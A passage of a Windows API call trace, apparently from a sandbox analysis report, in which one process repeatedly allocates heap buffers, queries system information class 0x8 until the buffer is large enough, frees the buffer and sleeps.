hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.347] Sleep (dwMilliseconds=0x110) [0191.450] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.450] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.455] Sleep (dwMilliseconds=0x110) [0191.476] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.476] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.477] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.477] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.478] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.478] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.478] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.479] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.479] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.480] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.480] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.481] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.486] Sleep (dwMilliseconds=0x110) [0191.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.535] Sleep (dwMilliseconds=0x110) [0191.575] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.575] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.582] Sleep (dwMilliseconds=0x110) [0191.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.628] Sleep (dwMilliseconds=0x110) [0191.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.646] Sleep (dwMilliseconds=0x110) [0191.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.769] Sleep (dwMilliseconds=0x110) [0191.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.815] Sleep (dwMilliseconds=0x110) [0191.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.833] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.834] Sleep (dwMilliseconds=0x110) [0191.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.847] Sleep (dwMilliseconds=0x110) [0191.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.878] Sleep (dwMilliseconds=0x110) [0192.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.069] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.070] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.070] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.070] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.071] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.075] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.076] Sleep (dwMilliseconds=0x110) [0192.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.134] Sleep (dwMilliseconds=0x110) [0192.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 